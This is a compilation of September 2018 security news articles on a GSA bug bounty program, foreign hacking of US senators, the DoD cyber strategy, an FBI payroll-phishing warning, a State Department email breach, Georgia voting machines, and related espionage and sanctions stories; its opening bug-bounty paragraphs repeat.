TTS is willing to pay between 150 and $5,000 for flaws in *.login.gov, https://github.com/18F/identity-idp, https://github.com/18F/identity-sp-sinatra, https://github.com/18F/identity-sp-python, https://github.com/18F/identity-sp-java, and https://github.com/18F/identity-sp-rails.

“‘Subdomain hijacking’ (taking control of a subdomain that was otherwise unused, such as by taking advantage of a dangling CNAME to a third party service provider) is in-scope for bounty awards, when the affected hostnames are within the second-level domains that appear in our in-scope list. These reports will always be considered low-severity unless there is further demonstrated impact,” TTS says.

HackerOne has conducted six bug bounty programs with the U.S. Department of Defense’s Defense Digital Service (DDS), starting with Hack the Pentagon in 2016 and continuing with Hack the Army, Hack the Air Force, Hack the DTS, Hack the Air Force 2, and Hack the Marine Corps.

U.S. General Service Administration Launches Bug Bounty Program

25.9.2018 securityweek  BigBrothers

The United States General Service Administration’s (GSA) Technology Transformation Service (TTS) has launched a bug bounty program on HackerOne, the hacker-powered security platform announced on Friday.

GSA, the first federal civilian agency to have launched a bug bounty program, is willing to pay up to $5,000 for Critical vulnerabilities found in its services. However, only some of the GSA’s TTS services are included in the multi-year HackerOne bug bounty program.

Last year GSA launched a bug bounty and vulnerability disclosure program (VDP) with HackerOne and paid between $300 and $5,000 for flaws reported in public-facing digital systems, including TTS assets such as login.gov, data.gov, cloud.gov and vote.gov.

HackerOne was awarded the new contract in September, following an open market bidding process. The period will extend for up to 5 years.

On HackerOne’s website, TTS reveals that the scope of the program includes services such as Federalist, data.gov, cloud.gov, and login.gov.

For vulnerabilities in the open source static site web publishing service Federalist, TTS is willing to pay between $250 and $5,000, depending on each flaw’s severity. Assets within scope include federalist.18f.gov, federalist-proxy.app.cloud.gov, federalist-docs.18f.gov, and open source resources (hosted on GitHub) 18F/federalist, 18F/federalist-builder, 18F/federalist-proxy, 18F/federalist-docker-build, and 18F/docker-ruby-ubuntu.

For Data.gov, rewards range between $150 and $2,000, and are awarded for vulnerabilities in www.data.gov, api.data.gov, federation.data.gov, sdg.data.gov, labs.data.gov, catalog.data.gov, inventory.data.gov, static.data.gov, admin-catalog-bsp.data.gov, and GSA/data.gov and GSA/datagov-deploy resources (also on GitHub).

The same bounty amounts are awarded for flaws in Cloud.gov assets, including cloud.gov, account.fr.cloud.gov, admin.fr.cloud.gov, alertmanager.fr.cloud.gov, api.fr.cloud.gov, ci.fr.cloud.gov, dashboard.fr.cloud.gov, diagrams.fr.cloud.gov, grafana.fr.cloud.gov, idp.fr.cloud.gov, login.fr.cloud.gov, logs.fr.cloud.gov, logs-platform.fr.cloud.gov, nessus.fr.cloud.gov, opslogin.fr.cloud.gov, prometheus.fr.cloud.gov, and ssh.fr.cloud.gov.

TTS is willing to pay between 150 and $5,000 for flaws in *.login.gov, https://github.com/18F/identity-idp, https://github.com/18F/identity-sp-sinatra, https://github.com/18F/identity-sp-python, https://github.com/18F/identity-sp-java, and https://github.com/18F/identity-sp-rails.

“‘Subdomain hijacking’ (taking control of a subdomain that was otherwise unused, such as by taking advantage of a dangling CNAME to a third party service provider) is in-scope for bounty awards, when the affected hostnames are within the second-level domains that appear in our in-scope list. These reports will always be considered low-severity unless there is further demonstrated impact,” TTS says.

HackerOne has conducted six bug bounty programs with the U.S. Department of Defense’s Defense Digital Service (DDS), starting with Hack the Pentagon in 2016 and continuing with Hack the Army, Hack the Air Force, Hack the DTS, Hack the Air Force 2, and Hack the Marine Corps.

Lawmaker: US Senate, Staff Targeted by State-Backed Hackers
22.9.2018 securityweek

Foreign government hackers continue to target the personal email accounts of U.S. senators and their aides — and the Senate’s security office has refused to defend them, a lawmaker says.

Sen. Ron Wyden, an Oregon Democrat, said in a Wednesday letter to Senate leaders that his office discovered that “at least one major technology company” has warned an unspecified number of senators and aides that their personal email accounts were “targeted by foreign government hackers.” Similar methods were employed by Russian military agents who leaked the contents of private email inboxes to influence the 2016 elections.

Wyden did not specify the timing of the notifications, but a Senate staffer said they occurred “in the last few weeks or months.” The aide spoke on condition of anonymity because he was not authorized to discuss the issue publicly.

But the senator said the Office of the Sergeant at Arms, which oversees Senate security, informed legislators and staffers that it has no authority to help secure personal, rather than official, accounts.

“This must change,” Wyden wrote in the letter. “The November election grows ever closer, Russia continues its attacks on our democracy, and the Senate simply does not have the luxury of further delays.” A spokeswoman for the security office said it would have no comment.

Wyden has proposed legislation that would allow the security office to offer digital protection for personal accounts and devices, the same way it does with official ones. His letter did not provide additional details of the attempts to pry into the lawmakers’ digital lives, including whether lawmakers of both parties are still being targeted.

Google and Microsoft, which offer popular private email accounts, declined to comment.

The Wyden letter cites previous Associated Press reporting on the Russian hacking group known as Fancy Bear and how it targeted the personal accounts of congressional aides between 2015 and 2016. The group’s prolific cyberspying targeted the Gmail accounts of current and former Senate staffers, including Robert Zarate, now national security adviser to Florida Sen. Marco Rubio, and Jason Thielman, chief of staff to Montana Sen. Steve Daines, the AP found.

The same group also spent the second half of 2017 laying digital traps intended to look like portals where Senate officials enter their work email credentials, the Tokyo-based cybersecurity firm TrendMicro has reported.

Microsoft seized some of those traps, and in September 2017 apparently thwarted an attempt to steal login credentials of a policy aide to Missouri Sen. Claire McCaskill , the Daily Beast discovered in July. Last month, Microsoft made news again when it seized several internet domains linked to Fancy Bear , including two apparently aimed at conservative think tanks in Washington.

Such incidents “only scratch the surface” of advanced cyberthreats faced by U.S. officials in the administration and Congress, according to Thomas Rid, a cybersecurity expert at Johns Hopkins University. Rid made the statement in a letter to Wyden last week .

“The personal accounts of senators and their staff are high-value, low-hanging targets,” Rid wrote. “No rules, no regulations, no funding streams, no mandatory training, no systematic security support is available to secure these resources.”

Attempts to breach such accounts were a major feature of the yearlong AP investigation into Fancy Bear that identified hundreds of senior officials and politicians — including former secretaries of state, top generals and intelligence chiefs — whose Gmail accounts were targeted.

The Kremlin is by no means the only source of worry, said Matt Tait, a University of Texas cybersecurity fellow and former British intelligence official.

“There are lots of countries that are interested in what legislators are thinking, what they’re doing, how to influence them, and it’s not just for purposes of dumping their information online,” Tait said.

In an April 12 letter released by Wyden’s office, Adm. Michael Rogers — then director of the National Security Agency — acknowledged that personal accounts of senior government officials “remain prime targets for exploitation” and said that officials at the NSA and Department for Homeland Security were discussing ways to better protect them. The NSA and DHS declined to offer further details.

Guarding personal accounts is a complex, many-layered challenge.

Rid believes tech companies have a sudden responsibility to nudge high-profile political targets into better digital hygiene. He said he did not believe much as been done, although Facebook announced a pilot program Monday to help political campaigns protect their accounts, including monitoring for potential hacking threats for those that sign up.

Boosting protection in the Senate could begin with the distribution of small chip-based security devices such as the YubiKey, which are already used in many secure corporate and government environments, Tait said. Such keys supplement passwords to authenticate legitimate users, potentially frustrating distant hackers.

Cybersecurity experts also recommend them for high-value cyber-espionage targets including human rights workers and journalists.

“In an ideal world, the Sergeant at Arms could just have a pile of YubiKeys,” said Tait. “When legislators or staff come in they can (get) a quick cybersecurity briefing and pick up a couple of these for their personal accounts and their official accounts.”

Department of Defense Releases New Cyber Strategy
22.9.2018 securityweek

The U.S. Department of Defense this week released its 2018 cyber strategy, which outlines how the organization plans on implementing the country’s national security and defense strategies in cyberspace.

The new cyber strategy, which supersedes the 2015 strategy, focuses on the competition with China and Russia, but it also mentions other actors, such as North Korea and Iran. The DoD says China has been “eroding U.S. military overmatch and the Nation’s economic vitality” by stealing information, while Russia has used cyber operations to influence elections.

“The Department must take action in cyberspace during day-to-day competition to preserve U.S. military advantages and to defend U.S. interests. Our focus will be on the States that can pose strategic threats to U.S. prosperity and security, particularly China and Russia,” the Pentagon wrote in a summary of the new cyber strategy.

“We will conduct cyberspace operations to collect intelligence and prepare military cyber capabilities to be used in the event of crisis or conflict. We will defend forward to disrupt or halt malicious cyber activity at its source, including activity that falls below the level of armed conflict. We will strengthen the security and resilience of networks and systems that contribute to current and future U.S. military advantages,” it added.

The DoD wants cyber forces to be prepared to assist air, land, sea and space forces during wartime to gain military advantage over its adversaries, which the Pentagon says are also increasingly reliant on computers.

One of the Department’s goals is to ensure that the U.S. can “fight and win wars” in cyberspace while being able to defend its own systems. Another objective is to prevent, defeat and deter malicious cyber activities aimed at critical infrastructure. Finally, the Pentagon wants to work with allies and partners to strengthen its cyber capabilities, expand cyber operations, and enhance information sharing.

As for its strategic approach, the DoD wants to “build a more lethal force, compete and deter in cyberspace, expand alliances and partnerships, reform the Department, and cultivate talent.”

The creation of “more lethal force” includes accelerating the development of cyber capabilities for warfighting and counterattacks, leveraging automation and data analysis to improve effectiveness, employing off-the-shelf capabilities in addition to its own, and moving from what it calls a “zero defect” culture to one that fosters agility and innovation.

The Pentagon hopes to deter adversaries by securing its own systems and critical infrastructure, but if that fails it wants to be ready to “employ the full range of military capabilities in response.”

The DoD has recently conducted its first ever cyber posture review, as directed by the National Defense Authorization Act. The results of the review are classified, but a factsheet made public by the organization reveals that the DoD must “continue investments in people, capabilities, and processes to meet fully the objectives set forth in the Strategy.”

FBI Warns of Cyber-Thieves Targeting Payroll Accounts
22.9.2018 securityweek

Cybercriminals are targeting the online payroll accounts of employees in a variety of industries to divert funds, the Federal Bureau of Investigation (FBI) warns.

According to an alert from the FBI’s Internet Complaint Center (IC3), numerous such attacks have been already reported, with education, healthcare, and commercial airway transportation being the most impacted industries.

The preferred attack method is phishing, which allows cybercriminals to capture an employee’s login credentials. Armed with this information, the cybercriminals then access the employee’s payroll account and swiftly change their bank account information.

The cyber-thieves also add rules to the employees’ payroll accounts to ensure that they do not receive alerts regarding direct deposit changes. Next, the attackers change direct deposits and redirect them to accounts they control.

Payroll diversion, the FBI says, can be mitigated through educating employees about the scheme and through informing them on preventative strategies and appropriate reactive measures they should take once a breach has occurred.

“Instruct employees to hover their cursor over hyperlinks included in emails they receive to view the actual URL. Ensure the URL is actually related to or associated with the company it purports to be from,” the FBI says.

Phishing relying on URLs is successful due to the use of links that closely resemble those of websites owned by the organizations they purport to be from, but instead take the victim to pages controlled by the attackers.

The FBI also notes that instructing employees to not provide log-in credentials or personally identifying information in response to any email should mitigate phishing risks as well. Employees should also be taught to forward any suspicious requests for personal information to the information technology or human resources department.

Organizations should also ensure that the credentials used for payroll purposes are different from those used for other purposes. Heightened scrutiny to bank information initiated by employees when looking to update or change direct deposit credentials and monitoring employee logins that occur outside normal business hours should also mitigate the risks associated with payroll diversion.

Furthermore, organizations are advised to restrict access to the Internet on systems handling sensitive information and to consider adopting two-factor authentication for access to sensitive systems and information. Allowing only required processes to run on systems handling sensitive information is yet another mitigating factor.

US State Department confirms data breach to unclassified email system
21.9.2018 securityaffairs

The US State Department confirmed that hackers breached one of its email systems, the attack potentially exposed personal information of some of its employees.
The incident seems to have affected less than 1% of employee inboxes, 600-700 employees out of 69,000 people.

“The Department recently detected activity of concern in its unclassified email system, affecting less than 1 per cent of employee inboxes. Like any large organization with a global presence, we know the Department is a constant target for cyber attacks,” states the US State Department.

“We have not detected activity of concern in the Department’s classified email system. We determined that certain employees’ personally identifiable information (PII) may have been exposed. We have already notified those employees.”

The security breach affected an unclassified email system at the State Department, the news of the hack came to light after Politico obtained a “Sensitive but Unclassified” notice about the incident.

“This is an ongoing investigation, and we are working with partner agencies, as well as the private sector service provider, to conduct a full assessment.” a State Department spokesperson told Politico.

“We will reach out to any additional impacted employees as needed.”

After the Agency noticed the “suspicious activity” in its email system notified the incident to a number of employees whose personal information may have been compromised.

US State Department didn’t reveal which kind of data had been accessed by attackers, at the time of writing we only know that no classified information had been exposed.

The Agency claimed it took steps to secure its system, and it is offering three years of credit and identity theft monitoring to the affected employees.

A group of senators wrote to Secretary of State Mike Pompeo last week raising concerns that the department did not meet federal standards for cybersecurity and questioning its resilience to cyber attacks.

“Sens. Ron Wyden (D-Ore.), Rand Paul (R-Ky.), Ed Markey (D-Mass.), Jeanne Shaheen (D-N.H.) and Cory Gardner (R-Colo.) asked Pompeo for an update on what the State Department has done to address its “high risk” designation, and how many cyberattacks the department had been subject to abroad in the last three years.” reported TheHill.

Georgia's Use of Electronic Voting Machines Allowed for Midterms
20.9.2018 securityweek

Judge Amy Totenberg ruled Monday that the state of Georgia's existing plans for the midterm elections to be conducted via some 27,000 Diebold AccuVote DRE touchscreen voting machines must stand. Her remarks, however, suggest that this should be the last time.

Plaintiffs, comprising the Coalition for Good Governance and citizens of Georgia, had filed a Motion for Preliminary Injunction against the Secretary of State for Georgia, Brian Kemp, in an attempt to force a switch to paper-based voting in time for the November elections. The primary argument is that the direct-recording election (DRE) machines to be used cannot produce a paper-based audit trail to verify accurate elections.

This coupled with the exposure of the registration details of 6.7 million Georgia voters on an unprotected internet-facing database, repeated demonstrations that such voting machines can be hacked, federal government advice that audit trails are necessary, and the constitutional right for citizens to vote was the basis of the plaintiffs' argument.

The Secretary of State's response, while insisting that the machines are secure, was primarily focused on the cost, lack of time, and potential confusion that such a late switch could cause.

Judge Totenberg ultimately agreed with the defendants and denied the plaintiff's motion -- but her concluding remarks demand that the state change its attitude in the future. "The State's posture in this litigation -- and some of the testimony and evidence presented -- indicated that the Defendants and State election officials had buried their heads in the sand," she wrote.

She indicated that she is not happy withc the way the state handled "the ramifications of the major data breach and vulnerability at the Center for Election Services" and "a host of serious security vulnerabilities permitted by their outdated software and system operations."

Nor was she happy with the way the state presented its case. "Defendants will fail to address that reality if they demean as paranoia the research-based findings of national cybersecurity engineers and experts in the field of elections." In its response to the Motion, the state had dismissed the plaintiffs' concerns as 'paranoia'.

Furthermore, reading between the lines of her concluding remarks, she intimates that she expects the case to come back before future elections, says that she will insist "on further proceedings moving on an expedited schedule", and concludes, "The 2020 elections are around the corner. If a new balloting system is to be launched in Georgia in an effective manner, it should address democracy's critical need for transparent, fair, accurate, and verifiable election processes that guarantee each citizen's fundamental right to cast an accountable vote."

Robert A McGuire, lead attorney for Coalition for Good Governance, expressed disappointment in the ruling, but confirmed that the case will continue. "We will continue to press these voting rights claims, and we fully expect to prevail in the end," he commented.

Bruce P. Brown, Atlanta attorney for the Coalition, added, "Judge Totenberg's decision is broadly consistent with the positions that the Coalition is taking in the case -- particularly the urgent need for Georgia, as soon as feasible, to switch to paper ballots."

Morrison & Foerster partner David Cross, attorney for the citizens of Georgia among the plaintiffs, agrees. "We read the decision as essentially saying it's too late for something at this point, but for the 2020 elections, there will be a change."

Cross told SecurityWeek, "Although the court denied the preliminary injunction, it finds that the current system is critically unsecure and that those entrusted with securing the election are remarkably unqualified and ill-informed about election security. The court emphasizes that our case will proceed expeditiously and finds that we ultimately are likely to win on the merits, which means the state will have to adopt a new, secure system before the 2020 elections. Ironically, it seems the court had little confidence in the state's ability to implement paper ballots now because of the ineptitude that certain election officials exhibited in this case."

Marilyn Marks, the Executive Director of Coalition for Good Governance, said, "The Secretary of State Kemp, the State Election Board, and the bi-partisan Fulton County Election Board refused to act in response to serious and repeated warnings from Congress, federal agencies, National Academy of Science and scores of expert voting system computer scientists that the paperless system is unfit for conducting public elections."

In 'Securing the Vote: Protecting American Democracy', compiled in January 2017 and recently published as a paperback and online, The National Academies warn "According to assessments by members of the U.S. Intelligence Community, actors sponsored by the Russian government 'obtained and maintained access to elements of multiple US state or local electoral boards.' While the full extent and impact of these activities is not known and our understanding of these events is evolving, there is little doubt that these efforts represented an assault on the American system of representative democracy."

One of the recommendations from the Academies is that "Voting machines that do not provide the capacity for independent auditing (e.g., machines that do not produce a voter-verifiable paper audit trail) should be removed from service as soon as possible." Georgia's Diebold AccuVote systems fall within this category.

Nation State Cyber Attacks on Rise, Says Europol
20.9.2018 securityweek

Global ransomware attacks are increasingly linked to nation states, with the lines between politics and crime often blurring, Europe's police agency said on Tuesday.

Key ransomware attacks include the so-called WannaCry and NotPetya malware, which infected hundreds of thousands of computers around the world in 2017, demanding that users pay ransoms to regain access.

"Ransomware retains its dominance," said Europol's latest annual report on cybercrime.

"In addition to attacks by financially motivated criminals, a significant volume of public reporting increasingly attributes global cyber-attacks to the actions of nation states," said the agency, based in The Hague.

The report added that it was "increasingly difficult" to determine whether it was a "sophisticated" cybercrime organised crime group, a state sponsored attacker, or a cybercrime amateur.

On September 6, the US charged a North Korean programmer with the WannaCry hack, the 2014 Sony Pictures attack and a 2016 cyber-heist on Bangladesh's central bank, alleging they were carried out on behalf of the regime in Pyongyang.

In February the United States and Britain blamed the Russian military for the "NotPetya" ransomware, calling it a Kremlin effort to destabilise Ukraine which spun out of control.

Europol said cyberattackers are also abandoning "random attacks" on mass targets in favour of tailored targeting of people and businesses "where greater potential benefits lie."

At the same time, Europol said cyberattackers who once trained their sights on traditional financial businesses were now focusing on cryptocurrencies such as Bitcoin.

However classic internet phishing scams -- emails that offer technical support, money-making scams or romance -- "still result in a considerable numbers of victims," said the agency.

- 'Most disturbing' -

Europol also raised the alarm over the live streaming of child sex abuse, a growing part of what it called the "most disturbing aspect of cyber-crime."

"Live streaming of child sexual abuse remains a particularly complex crime to investigate and is likely to further increase in the future," it said.

This involved both material uploaded by offenders, and also by children who were either tricked into uploading explicit material, or made to do it through extortion.

Europol meanwhile warned that the European Union's flagship new data protection laws introduced in May were "significantly hampering the ability of investigators across the world to identify and investigate online crime."

It said the world's internet body had ordered the removal of all personal data from the global domain name database -- formerly a key resource for police -- as it did not comply with the EU law.

Europol chief Catherine De Bolle said this development "emphasises the need for law enforcement to engage with policy makers, legislators and industry, in order to have a voice in how our society develops."

view counter

Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal case
17.9.2018 securityaffairs

Dutch intelligence services arrested two alleged Russian spies that were planning to hack a Swiss laboratory where is ongoing an investigation on the poisoning of the spy Sergei Skripal.
According to Dutch-based NRC newspaper and Swiss daily Tages-Anzeiger, Dutch intelligence services arrested two alleged Russian spies working for Russia’s GRU military intelligence service on suspicion of planning to hack the Spiez laboratory near Bern.

The laboratory conducts investigations for a global chemical arms watchdog, the Organisation for the Prohibition of Chemical Weapons (OPCW), its researchers were investigating the poisoning of agent Sergei Skripal and his daughter in Salisbury.

The two agents carried equipment to hack into the network of the laboratory to spy on the activity of its researchers.

Russian Foreign Minister Sergei Lavrov expressed his disappointment for the arrest of the two men earlier this year.

“The two were detained “early this year” by Dutch military intelligence (MIVD) working together with several other countries, and then expelled from the Netherlands, the newspapers reported.” states the AFP press.

The decision to expel the two spies was taken by the cabinet of the Dutch Prime Minister Mark Rutte on March 26.

“The duo, according to sources within the investigation, carried equipment which they wanted to use to break into the computer network” of the Spiez laboratory.

The researchers at the Spiez Lab were analyzing data related to poison gas attacks in Syria, as well as the attack on the double agent Sergei Skripal that involved the nerve agent Novichok on Russian double agent Sergei Skripal and his daughter.

“The case of the Russian spies discovered in The Hague and then expelled from The Hague is known to Swiss authorities,” Isabelle Graber, spokeswoman for the Swiss intelligence services (SRC), told AFP.

“[The SRC] actively participated in this operation in collaboration with its Dutch and British partners in prevention of illegal actions against critical Swiss infrastructure.“

Spiez laboratory representatives confirmed to have observed hacking attempts in the last months and to have taken precautions to repeal them.

Skripal Labor Spiez

Andreas Bucher, a spokesman for the Spiez lab, told AFP that in June attackers took documents from the lab’s website and “distributed a very malicious malware virus” to affiliated agencies.

It is interesting to note that the same piece of malware was used in the attacks on the Pyeongchang Winter Olympics in South Korea.

According to The Washington Post, the incidents were caused by cyber attacks powered by hackers working at Russia’s GRU military intelligence agency that managed to take control in early February of 300 computers linked to the Olympic organization.

The cyber attacks were a retaliation against the International Olympic Committee for banning the Russian team from the Winter Games due to doping cases of Russian athletes.

In April Russia’s SVR foreign intelligence service information chief Sergei Ivanov accused the OPCW of “manipulating” the results of the Skripal case.

According to information obtained by Ivanov, the OPCW was omitting findings from the Spiez laboratory, he explained that the samples sent by the OPCW contained a nerve agent called “BZ” which was manufactured by the West.

German Troops Face Russian 'Hybrid War' in Lithuania: Merkel
15.9.2018 securityweek BigBrothers

German Chancellor Angela Merkel said Friday Berlin was boosting military cyber capabilities to respond to Russian hybrid warfare that is targeting its troops deployed on NATO's eastern flank.

"Here you are also confronted with a situation that represents another part of the Russian military doctrine: the idea of hybrid warfare," she told German troops stationed in Lithuania as part of a NATO force deployed to deter Russia.

NATO allies have accused Russia of using "hybrid warfare" techniques, including subversion, propaganda and cyber warfare, to undermine the West without triggering a full NATO military response.

Russia has repeatedly denied that it stages such attacks and has accused the US-led alliance of provoking an arms race.

"Hybrid warfare is not something that we are very used to. You clearly experience this here in very specific ways," Merkel added, without elaborating.

"It is not for nothing that we built in Germany a special cyber unit within the German military in order to build capabilities in this area," she told troops at their base in Rukla, northwest of the capital Vilnius.

Last year, Germany deployed over 500 troops in Lithuania as part of a NATO mission to reassure eastern allies and deter Russia.

Soon after their arrival, German troops were subjected to false rape accusations while media reports said Moscow also targeted NATO soldiers' smartphones.

Fears that Russia could attempt to attack NATO's ex-communist states surged after Moscow's 2014 annexation of Crimea from Ukraine, a move that sent East-West relations to their lowest point since the Cold War.

Besides Lithuania, 1,000-strong NATO battalions were also deployed in fellow Baltic states Latvia and Estonia and neighbouring Poland.

Trump OKs Sanctions for Foreigners Who Meddle in Elections
15.9.2018 securityweek BigBrothers

President Donald Trump signed an executive order Wednesday authorizing sanctions against foreigners who meddle in U.S. elections, acting amid criticism that he has not taken election security seriously enough.

“We felt it was important to demonstrate the president has taken command of this issue, that it’s something he cares deeply about — that the integrity of our elections and our constitutional process are a high priority to him,” said national security adviser John Bolton.

In the order, the president declared a national emergency, an action required under sanctions authority, to deal with the threat of foreign meddling in U.S. elections.

The order calls for sanctioning any individual, company or country that interferes with campaign infrastructure, such as voter registration databases, voting machines and equipment used for tabulating or transmitting results. It also authorizes sanctions for engaging in covert, fraudulent or deceptive activities, such as distributing disinformation or propaganda, to influence or undermine confidence in U.S. elections.

It requires the national intelligence director to make regular assessments about foreign interference and asks the Homeland Security and Justice departments to submit reports on meddling in campaign-related infrastructure. It also lays out how the Treasury and State departments will recommend what sanctions to impose.

With the midterm elections now two months away, National Intelligence Director Dan Coats said the U.S. is not currently seeing the intensity of Russian intervention that was experienced in 2016, but he didn’t rule it out. He said the U.S. is also worried about the cyber activities of China, North Korea and Iran.

Coats said Trump’s order directs intelligence agencies to conduct an assessment within 45 days after an election to report any meddling to the attorney general and Department of Homeland Security. The attorney general and Department of Homeland Security then have another 45 days to assess whether sanctions should be imposed.

“This clearly is a process put in place to try to assure that we are doing every possible thing we can, first of all, to prevent any interference with our elections, to report on anything we see between now and the election, but then to do a full assessment after the election to assure the American people just exactly what may have happened or may not have happened,” Coats said.

Sen. Marco Rubio, R-Fla., and Sen. Chris Van Hollen, D-Md., are pushing a bill that would prohibit foreign governments from purchasing election ads, using social media to spread false information or disrupting election infrastructure. They said Trump’s order recognizes the threat, but doesn’t go far enough.

The order gives the executive branch the discretion to impose sanctions for election meddling, but the bill would spell out sanctions on key economic sectors of a country that interferes. Those backing the legislation say that under the bill, a nation would know exactly what it would face if caught.

Virginia Sen. Mark Warner, ranking Democrat on the Senate intelligence committee, said the order leaves the president with broad discretion to decide whether to impose tough sanctions. “Unfortunately, President Trump demonstrated in Helsinki and elsewhere that he simply cannot be counted upon to stand up to (Russian President Vladimir) Putin when it matters,” said Warner, who is sponsoring the bill.

At a July 16 news conference with Putin in Helsinki, Trump was asked if he would denounce what happened in 2016 and warn Putin never to do it again. Trump did not directly answer the question. Instead, he delivered a rambling response, including demands for investigation of Hillary Clinton’s email server and his description of Putin’s “extremely strong and powerful” denial of meddling.

That drew outrage from both Republican and Democrats.

Trump has pushed back, saying that no other American president has been as tough on Russia. He has cited U.S. sanctions and the expulsion of alleged Russian spies from the U.S.

Mike Rogers, former director of the National Security Agency, said he thought Trump missed an opportunity in Helsinki to publicly scold Russia for meddling. Rogers said when he used to talk to Trump about the issue, Trump would often respond to him, saying “Mike, you know, I’m in a different place.”

Rogers said he would tell Trump: “Mr. President, I understand that, but I’m paid by the citizens of the nation to tell you what we think. Sir, this is not about politics, it’s not about parties. It’s about a foreign state that is attempting to subvert the very tenets of our structure.”

In his first public comments since he retired in June, Rogers said: “That should concern us as citizens. That should concern us leaders. And if we don’t do something, they (the Russians) are not going to stop.”

Rogers, who spoke Tuesday night at the Hayden Center at George Mason University in Virginia, also said earlier media reports claiming Trump had asked him to publicly deny any collusion between Moscow and Trump’s campaign were inaccurate.

James Clapper, the former national intelligence director who appeared with Rogers and other former intelligence officials, said he personally believes that the Russian interference did influence the outcome of the 2016 election, but didn’t elaborate.

“The Russians are still at it. They are committed to undermining our system,” Clapper said. “One of the things that really disturbs me is — that for whatever reason, I don’t know what it is — the president’s failure to dime out Putin and dime out the Russians for what they are doing.”

Greek Supreme Court Approves Russian Request for Bitcoin Suspect
14.9.2018 securityweek BigBrothers

Greece's Supreme Court on Friday said a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency should be extradited to Russia, a court source said.

Alexander Vinnik, who headed bitcoin exchange BTC-e, has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki.

The final decision is up to the Greek justice minister.

Vinnik has said he would accept extradition to Russia, where he is wanted on fraud charges totalling 9,500 euros ($11,000).

The United States and France are also seeking his extradition to face far more extensive fraud charges than in Russia.

A US court indicted Vinnik last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

The Greek Supreme Court in December had said Vinnik should be extradited to the US.

The French warrant says Vinnik had defrauded over 100 people in six French cities between 2016 and 2018.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

N. Korea Calls Sony, Wannacry Hack Charges Smear Campaign
14.9.2018 securityweek BigBrothers

PYONGYANG, North Korea (AP) — North Korea strongly denied claims by the United States that a computer programmer working for the North Korean government was involved in the hack of Sony Pictures Entertainment and the spread of the WannaCry ransomware.

In a statement Friday, a North Korean Foreign Ministry official said that the person named by U.S. is a "non-entity," and warned that the allegations, which he called a smear campaign, could harm talks between the two countries following the summit between President Donald Trump and North Korean leader Kim Jong Un.

U.S. federal prosecutors allege the programmer, identified as Park Jin Hyok, conspired to conduct a series of attacks that also stole $81 million from a bank in Bangladesh.

The U.S. believes he was working for a North Korean-sponsored hacking organization.

"The act of cybercrimes mentioned by the Justice Department has nothing to do with us," Han Yong Song, a researcher at the North Korean Foreign Ministry's Institute for American Studies, said in a statement carried by the Korean Central News Agency.

"The U.S. should seriously ponder over the negative consequences of circulating falsehoods and inciting antagonism against the DPRK that may affect the implementation of the joint statement adopted at the DPRK-U.S. summit," he said.

DPRK is short for North Korea's official name — the Democratic People's Republic of Korea.

In the statement, the North flatly denied it had anything to do with the 2104 Sony incident and WannaCry virus, calling the U.S. charges a "vicious slander and another smear campaign."

"The U.S. is totally mistaken if it seeks to gain anything from us through preposterous falsehoods and high-handedness," the statement said.

The U.S. government has previously said North Korea was responsible for the Sony hack, which led to the release of sensitive personal information about employees, including Social Security numbers, financial records, salary information, as well as embarrassing emails among top executives.

The FBI has also long suspected North Korea was behind WannaCry, which used malware to scramble data on hundreds of thousands of computers at hospitals, factories, government agencies, banks and other businesses across the globe.

Park is charged with two counts of conspiracy to commit computer and wire fraud.

The complaint said Park was on a team of programmers employed by what it said is a government front company called Chosun Expo that operated out of Dalian, China. The Treasury Department has added his name to their sanction list, prohibiting banks that do business in the U.S. from providing accounts to him or Chosun Expo.

It is the first time the Justice Department has brought criminal charges against a hacker said to be from North Korea.

Senators Concerned About State Department's Cybersecurity Failures
14.9.2018 securityweek BigBrothers

A group of United States senators this week sent a letter to Secretary of State Mike Pompeo requesting clarifications regarding the Department of State’s failure to meet federal cybersecurity standards.

The letter was signed by senators Ron Wyden, Cory Gardner, Edward J. Markey, Rand Paul, and Jeanne Shaheen.

The lawmakers cited a recent assessment by the General Service Administration (GSA), which revealed that the State Department had only deployed advanced access controls on 11 percent of the agency’s devices. The senators noted that all executive branch agencies are required by law, the Federal Cybersecurity Enhancement Act, to enable multi-factor authentication (MFA) on accounts with elevated privileges.

The officials also pointed out that a report last year from the Department of State’s Inspector General found that roughly one-third of diplomatic missions “failed to conduct even the most basic cyber threat management practices, like regular reviews and audits.” The same report noted that experts managed to exploit vulnerabilities in the agency’s email accounts, applications and operating systems during the tests they conducted.

“We are sure you will agree on the need to protect American diplomacy from cyber attacks, which is why we have such a hard time understanding why the Department of State has not followed the lead of many other agencies and complied with federal law requiring agency use of MFA,” the senators wrote.

The letter instructs the Department of State to provide information on the actions taken in response to the Office of Management and Budget (OMB) designating its cyber readiness as “high risk,” to clarify what actions it has taken to address the absence of MFA on high-privilege accounts, and to provide statistics for the past three years regarding the number of attacks launched against State Department systems located abroad.

“It is not surprising in that there is no stopping the ‘Bring Your Own Device’ train — not even our most sensitive federal agency can stop it. As a result, federal agencies are not immune from the cyber-security risks that the private sector has been grappling with for years — except when it comes to having to pay fines, defense costs, and large damage awards (not to mention losses from customer defections),” Todd Shollenbarger, COO of biometric technology company Veridium, said via email.

“For our federal government, no amount of ‘budgetary pressures’ (or other excuse) should be tolerated when it comes to failing to have utilized a basic cybersecurity technique, such as 2FA or MFA — especially since ‘user convenience’ is not the overriding concern. The good news is that NIST’s recently updated Digital Identity Guidelines (Special Publication 800-63-3) has done much of the hard work. What’s now needed — obviously — is for our federal government agencies to use it,” Shollenbarger added. “But remember: not all MFA solutions are built the same.”

Last year, the DHS issued a Binding Operational Directive (BOD) instructing all federal agencies to start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

A report published this summer by email threat protection company Agari revealed that over half of agencies had fully implemented the DMARC email security standard. However, the Department of State had only implemented DMARC on 9 of its 19 domains and was among the worst-performing agencies in this regard.

